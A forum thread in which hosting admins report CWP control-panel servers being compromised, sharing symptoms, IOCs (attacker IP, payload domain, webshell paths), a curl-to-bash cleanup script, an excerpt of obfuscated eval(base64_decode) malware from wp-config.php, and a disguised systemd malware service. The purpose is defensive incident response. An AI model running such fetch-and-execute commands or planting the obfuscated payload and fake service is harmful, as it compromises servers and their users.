Author Topic: I think there is a very serious security vulnerability in CWP right now.  (Read 1351 times)

0 Members and 1 Guest are viewing this topic.

Offline
*
I think there is a very serious security vulnerability in CWP right now. My and my friends' 10's of servers were hacked with this vulnerability. I've been trying to identify the source for days.

Now I think I may have found the source of the problem. If this vulnerability is as I guess, it is a very serious security vulnerability. They can easily gain root access to the server.

I have been trying to explain this to CWP staff through the ticket system for days, but freelancers are handling the tickets. I mention that there may be a serious security vulnerability in the CWP panel right now, and they say pay me to look at your ticket.

Offline
*****
IOC? Symptoms?

Offline
*
Hello,

The main symptoms are:
- `eval(base64_decode( ...` - in index files. This infection most likely redirects users to various websites from the mobile version, sends all user session information to third parties, and so on.
- Creates `/var/lib/mysql/.ssh` with keys, and accordingly, provides the /bin/bash shell with mysql in passwd
- Adds a malicious script to the directory `/tmp/.cwp_script.sh`
- Creates users. Random letters or something similar, such as __user, user__, login, imunify. Check—there is a .ssh directory inside.
- Creates SSH keys in the root directory. ` ~/.ssh/authorized_keys `
That's what I've noticed.
___
How can this be addressed?

The source of the problem is most likely an outdated version of Roundcube. This issue is described in `CVE‑2025‑49113`
https://censys.com/advisory/cve-2025-49113/

This issue occurs on systems running outdated operating systems, such as CentOS 7.

I have created a script that performs the following actions:
- Pre-configuration: Interactively prompts whether to install ImunifyAV, change the SSH port, and generate a new secure password for root.
- Backdoor cleanup: Checks for malicious files in `/var/lib/mysql/.ssh` and `/tmp/.cwp_script.sh` (deletes them) and displays the date of the last modification of the root SSH keys (authorized_keys).
- Panel and Mail Updates: Installs the latest version from the 1.5.x branch.
- Network protection (CSF): Closes vulnerable CWP ports (2030, 2031, 2082, 2083, 2086, 2087, 2095, 2096) and configures a new SSH port.
Important for working with the client: Since the control panel ports are closed to everyone, be sure to ask the client to provide their IP address so it can be added to the whitelist
```
Please provide your IP address so we can add it to the firewall whitelist.
You can find your IP address at: https://2ip.io
```
- Service audit: Restarts the necessary services and displays a list of those that failed to start using `systemctl --failed`.
- Antivirus protection: Installs ImunifyAV with the user’s consent, generates an access configuration, and automatically enables background scanning of the /home directory.
- Report generation: At the end, it outputs a ready-to-use, formatted text with new access rules and a list of tasks that can be easily copied to the client.

Backups and logging:

The script modifies the firewall configuration, so a backup is saved in `/etc/csf/csf.conf.bak.<year_month_day_time>`.

The entire process and the output of the update commands are logged in: `/var/log/cwp_maintenance.log`.

You can download and use the script with the following command:

bash -c "$(curl -fsSL https://gist.githubusercontent.com/ISWAPPP/be2407dd7424d04ac3f8b2be046df221/raw/6166abc7b3a26529a93631202f6aead65f7335cf/cwp-cracked-en.sh)"

Virus total: https://www.virustotal.com/gui/url-analysis/u-6d4cf1899e7680e39a949576d464ae4f482c0e861f6a800d6ec23f20d95a12f0-1ecad511

Next, run `grep -liR ‘eval(base64_decode( ’` in the websites directory to clean up the aftermath of the hacks.

Please let me know if you have any additional details or would like to improve the script.
« Last Edit: June 13, 2026, 01:44:29 PM by iswap »

Offline
*
We are probably talking about the same problem.

but the problem exists on a server with almalinux8 and up to date

Offline
*
@iswap not succsess

Offline
*
I can't paste my log here forum not accept

Offline
**
We saw similar behavior on AlmaLinux 9.8 / CWP.

Observed IOCs:
- external IP: 89.248.172.183
- webshell path: /temp/.x.php
- CWP service-path shell: /usr/local/cwpsrv/var/services/oauth/v1.0a/server/www/.r.php
- downloaded payload source: mars.imasync.com
- repeated unauthorized SSH key fingerprint: SHA256:w79EbEKrlqugvMc8n/i9dQ5QuvhFBdJZDA/UKdSek2o
- mass unauthorized authorized_keys files across service/user accounts
- sudoers NOPASSWD backdoors for service/system accounts
- service/system account password hashes were set

Offline
*
We saw similar behavior on AlmaLinux 9.8 / CWP.

Observed IOCs:
- external IP: 89.248.172.183
- webshell path: /temp/.x.php
- CWP service-path shell: /usr/local/cwpsrv/var/services/oauth/v1.0a/server/www/.r.php
- downloaded payload source: mars.imasync.com
- repeated unauthorized SSH key fingerprint: SHA256:w79EbEKrlqugvMc8n/i9dQ5QuvhFBdJZDA/UKdSek2o
- mass unauthorized authorized_keys files across service/user accounts
- sudoers NOPASSWD backdoors for service/system accounts
- service/system account password hashes were set

Same problem. CWP urgently needs to do something about this issue. The situation exists even on the latest OS.

It is only a matter of time before our servers are encrypted. If it is encrypted, everything will be gone.

Offline
*
i can subscribe to this. Alma 8.10 with all  updates.

Almost all wp-config.php files from every site had eval(base64_decode added

# grep -R "eval(base64_decode" .
./wp-config.php: eval(base64_decode("aW5pX3NldCgiZGlzcGxheV9lcnJvcnMiLCAwKTsKaW5pX3NldCgiZGlzcGxheV9zdGFydHVwX2Vycm9ycyIsIDApOwoKaWYgKFBIUF9TQVBJICE9PSAiY2xpIiAmJiAoCiAgICBzdHJwb3MoQCRfU0VSVkVSWyJSRVFVRVNUX1VSSSJdLCAiL3dwLWFkbWluL2FkbWluLWFqYXgucGhwIikgPT09IGZhbHNlICYmCiAgICBzdHJwb3MoQCRfU0VSVkVSWyJSRVFVRVNUX1VSSSJdLCAiL3dwLWpzb24iKSA9PT0gZm



From my point of view entry point is : webftp_simple ( present in /usr/local/apache/htdocs/ ).

I had also a malware installed as service which pretended to be a kernel service.

# systemctl cat defunct.service
# /usr/lib/systemd/system/defunct.service
[Unit]
Description=D-Bus System Connection Bus
After=network.target

[Service]
Type=simple
Restart=always
RestartSec=300
WorkingDirectory=/root
ExecStart=/bin/bash -c "GS_ARGS='-k /lib/systemd/system/defunct.dat -ilq' exec -a '[slub_flushwq]' '/usr/bin/defunct'"

[Install]
WantedBy=multi-user.target


Virustotal confirmed that /usr/bin/defunct is malware.



Also search for other shell files instaled after breaking the system.

find /home /var/www -name "cmd.php" -o -name "shell.php" -o -name "c99.php" \
  -o -name "r57.php" -o -name "wso.php" 2>/dev/null

Offline
*
I also noticed two days ago that the entry point is webftp_simple, I just didn't want to mention it here.

Offline
*****
Simple solution, keep your servers updated.
And IF you are still running CentOS 7, you can expect to be hacked, running an EOL OS that is public facing.

There was a major Kernel Auth vulnerability that's has been activity exploited.
AlmaLinux released fixed Kernels on 2026-06-08 for AL8 and AL9.

Someone mentioned an old CVE for Roundcube, that only affected Roundcube Webmail versions prior to 1.5.10.
The current version is 1.5.15

Servers using Apache also had a problem, that the update to 2.4.68 fixed

Offline
**
CWP team must release a urgent update that fix all the current services with issues, RoundCube, Nginx, Apache, etc.
This is urgent!
We are paying for something that its full of security issues

Offline
*
Nothing to do with this issue, but we having problems with backups for months, various updates was released and does not fixed the issue.

This panel is a low-cost panel, and for that reason, there are probably few people working on it, which makes the development and bug fixing process very slow.
It has GREAT features, but need more assistance.

I would like to express my interest in participating in the development or bug fixing of the interface.

Thanks!



Offline
*
I prepared a new server and installed almalinux9. I want to move the sites on the old server to the new server, but CWP->CWP migration does not work.

I take a manual backup from the old server and move it to the new server without any problems, but when importing it on the new server, it cannot open the compressed file and gives an error.

CWP is really starting to cost our days and our health.

Tickets that are not answered for days, security vulnerabilities that are not completely closed, functions that never work properly, etc.
« Last Edit: June 14, 2026, 01:40:09 PM by comokoko »

Offline
*
You are doing a clean installation on almalinux9. CWP is still trying to use the service command in the background. Friends, don't these developers know that the service command does not work in Almalinux 9?